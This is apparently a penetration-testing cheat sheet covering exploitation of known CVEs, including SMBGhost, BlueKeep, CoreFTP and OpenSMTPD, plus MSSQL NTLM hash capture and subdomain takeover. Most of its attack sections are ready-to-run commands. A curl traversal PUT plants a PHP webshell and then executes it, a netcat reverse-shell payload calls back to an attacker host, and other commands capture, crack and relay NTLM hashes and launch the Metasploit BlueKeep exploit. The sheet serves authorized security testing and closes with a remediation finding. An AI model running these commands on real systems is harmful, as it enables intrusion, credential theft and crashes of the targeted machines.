π‘οΈ Methodology Checklist
- SMBGhost (CVE-2020-0796):
nmap --script smb-vuln-cve2020-0796 -p 445 [TARGET] - BlueKeep (CVE-2019-0708): MSF auxiliary/scanner/rdp/cve_2019_0708_bluekeep
- OpenSMTPD (CVE-2020-7247): sender field injection for RCE
- CoreFTP (CVE-2022-22836): PUT via
--path-as-isto write outside webroot - Verify each CVE applicability against exact software version
- Capture NTLM hashes via xp_dirtree on MSSQL + Responder
- Run subdomain takeover check with subjack after DNS enumeration
π― Operational Context
Use when: Service version is identified β cross-reference against known CVEs before attempting manual exploitation.
Think Dumber First: searchsploit [service] [version] takes 3 seconds. Then nmap --script vuln [TARGET] for automated CVE checks. Check ExploitDB and NVD for CVEs within the last 3 years β older vulns are often patched but not always.
Skip when: Service is up-to-date per vendor advisory β skip CVE hunting and focus on misconfiguration and credentials.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
nmap -p 445 --script smb-vuln-cve2020-0796 [TARGET_IP] | Check SMBGhost (CVE-2020-0796) β Win10 1903/1909 unauthenticated RCE |
nmap -p 3389 --script rdp-vuln-ms12-020 [TARGET_IP] | Check BlueKeep indicator (CVE-2019-0708) RDP |
nmap -p 3389 --script rdp-enum-encryption [TARGET_IP] | Enumerate RDP encryption level |
curl -k -X PUT -H "Host: [TARGET_IP]" --basic -u [USER]:[PASS] --path-as-is https://[TARGET_IP]:443/../path/shell.php -d '<?php system($_GET["cmd"]); ?>' | CoreFTP CVE-2022-22836 β directory traversal file write via HTTP PUT |
nmap -p 445 -M ms17-010 [TARGET_IP] | EternalBlue (MS17-010) check via nmap |
nxc smb [DC_IP] -M zerologon | ZeroLogon (CVE-2020-1472) check |
nxc smb [DC_IP] -M petitpotam | PetitPotam NTLM relay coercion check |
nxc smb [DC_IP] -u [USER] -p [PASS] -M nopac | noPAC (CVE-2021-42278/42287) check |
host [SUBDOMAIN].[DOMAIN] | Subdomain takeover check β look for NXDOMAIN/404 CNAME target |
dig [SUBDOMAIN].[DOMAIN] CNAME | Resolve CNAME to find dangling DNS records |
nc -nv [TARGET_IP] 25; MAIL FROM:<;[CMD];> | OpenSMTPD CVE-2020-7247 concept (unauthenticated RCE in sender field) |
EXEC master..xp_dirtree '\\[LHOST]\share\'; | MSSQL xp_dirtree β force NTLM hash capture without auth bypass |
π¬ Deep Dive & Workflow
SMBGhost (CVE-2020-0796) β SMBv3.1.1 Compression RCE
# Check via nmap
sudo nmap -p 445 --script smb-vuln-cve2020-0796 [TARGET_IP]
# Affected: Windows 10 1903 and 1909 ONLY
# Pre-auth unauthenticated RCE via integer overflow in SMB compression handler
# Exploits land as SYSTEM (driver context)
# WARNING: Unstable β may BSOD target
# Verify OS version first:
nxc smb [TARGET_IP] # β shows OS version in output
# Mitigation check: KB4551762 installed?
nxc smb [TARGET_IP] -u [USER] -p [PASS] -x "wmic qfe list | findstr KB4551762"BlueKeep (CVE-2019-0708) β Pre-Auth RDP RCE
# Check via nmap
sudo nmap -p 3389 --script rdp-enum-encryption [TARGET_IP]
# BlueKeep affects: Windows XP/7/Server 2003/2008 β NOT Windows 8/10/Server 2012+
# Check via Metasploit (safe auxiliary module)
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOSTS [TARGET_IP]
run
# Exploit (UNSTABLE β test in lab only):
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# WARNING: Frequently causes BSOD. Always get written authorization before running.CoreFTP (CVE-2022-22836) β Authenticated Directory Traversal + File Write
# Prerequisite: valid FTP credentials
# Write webshell via HTTP PUT traversal
curl -k -X PUT -H "Host: [TARGET_IP]" \
--basic -u [USER]:[PASS] \
--path-as-is \
"https://[TARGET_IP]:443/../../xampp/htdocs/shell.php" \
-d '<?php system($_GET["cmd"]); ?>'
# --path-as-is is CRITICAL β without it, curl resolves ../ locally and strips traversal
# Verify write:
curl -k "https://[TARGET_IP]/shell.php?cmd=whoami"MSSQL xp_dirtree β NTLM Hash Capture
# Requires: MSSQL access (any privilege level)
# Effect: MSSQL server authenticates to attacker's SMB share β NTLMv2 hash captured
# Start Responder first
sudo responder -I [IFACE]
# Execute via MSSQL (impacket or GUI client)
EXEC master..xp_dirtree '\\[LHOST]\share\';
-- or
EXEC master..xp_cmdshell 'dir \\[LHOST]\share\'
# Crack captured hash
hashcat -a 0 -m 5600 ntlmv2.hash rockyou.txt
# Alternative: SMB relay if SMB signing disabled
impacket-ntlmrelayx -t [TARGET_IP] -smb2supportOpenSMTPD (CVE-2020-7247) β Unauthenticated RCE via Sender Field
# Affected: OpenSMTPD < 6.6.2 (Linux/BSD)
# RCE as root β mail service runs privileged
# Identify via banner
nc -nv [TARGET_IP] 25
# β 220 OpenSMTPD ESMTP
# Version check
nmap -p 25 --script smtp-commands [TARGET_IP]
# ExploitDB has Python PoC:
searchsploit "OpenSMTPD"
# β 47984 = Python exploit for CVE-2020-7247
# Length constraint: command must be β€ 64 chars
# Common payload: nc [LHOST] [LPORT] -e /bin/shSubdomain Takeover β Dangling CNAME
# Find dangling CNAME (NXDOMAIN on the cname target = vulnerable)
host sub.target.com
# β sub.target.com is an alias for something.s3.amazonaws.com
dig sub.target.com CNAME
# Check if the third-party resource exists
curl -s "https://something.s3.amazonaws.com/"
# β 404 NoSuchBucket = VULNERABLE β bucket was deleted but DNS still points here
# Exploitation: Register the resource at the third party
# β Create S3 bucket named "something" β serve your content
# β Users visiting sub.target.com see attacker-controlled content on official domain
# β Enables: phishing, cookie theft (same domain), CSP bypass, CSRF
# Automated scanning:
subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -sslπ οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| searchsploit returns no results | Version format wrong | Try: searchsploit apache 2.4 not full version; also search just product name |
| Nmap vuln scripts very slow | Large target or many ports | Run targeted: nmap -p 80,443 --script http-vuln* [TARGET] for web only |
| CVE PoC found but doesnβt work | Different patch level or env | Check PoC requirements carefully; many PoCs require specific sub-version or build |
| Metasploit module exists but fails | Auth required or patched | Verify: check command in MSF before exploit; module may report vulnerable even if patched |
| NVD shows CVE but no public exploit | 0-day or unexploited | Check: exploit-db.com, github.com/search?q=[CVE], packetstormsecurity.com |
π Reporting Trigger
Finding Title: Vulnerable Service Version Identified β Public Exploit Available Impact: Running a service version with a known public exploit provides attackers with a reliable exploitation path requiring no novel vulnerability research, reducing time-to-compromise to minutes. Root Cause: Patch management process failed to apply available security updates. Vulnerability scanning not integrated into patching workflow. Recommendation: Implement continuous vulnerability scanning with automatic patch prioritization. Establish SLA for critical CVE remediation (patch within 24-48 hours). Enable automatic security updates for OS and major services where operationally feasible.